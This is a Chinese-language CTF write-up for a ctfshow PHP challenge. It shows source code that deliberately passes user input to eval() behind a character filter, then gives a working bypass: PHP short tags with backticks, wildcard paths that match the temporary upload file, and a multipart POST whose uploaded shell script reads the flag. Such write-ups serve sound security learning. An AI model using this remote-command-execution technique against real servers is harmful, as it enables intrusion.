ctfshow红包题第二弹

八月 15, 2021

ctfshow刷题

红包题第二弹（命令执行+无数字字母rce->通配符使用）

题目源码：直接添加?cmd回车得到：

<?php

  if(isset($_GET['cmd'])){

    $cmd=$_GET['cmd'];

    highlight_file(__FILE__);

    if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){

    

      die("cerror");

    }

    if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\（|\）|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){

      die("serror");

    }

    eval($cmd);

  

  }



 ?>

执行命令方式：

system(‘ls’);
echo(ls);

echo+反引号

?><?=ls;

把前面的<?php给闭合掉

通配符与无字母数组命令执行

cat flag可以使用通配符进行替代，

那么我们上传的临时文件phpxxxxx.tmp也可以用php?????.tmp代替

PHP上传机制（解释上传的.tmp文件）

php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下，这里为/tmp，而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能，我们只要上传了文件，该文件就会被上传到upload_tmp_dir配置的目录下，上传完后会被删除。

通过POST提交修改这几行，可以得到flag

POST : ?cmd=?><?=.+/??p/p?p??????;

(这里的.命令执行的是 cat flag.txt)

Content-Type: multipart/form-data; boundary=---------------------------123

-----------------------------123

Content-Disposition: form-data; name="fileUpload"; filename="1.txt"

Content-Type: text/plain

\#! /bin/sh

cat /flag.txt

-----------------------------123--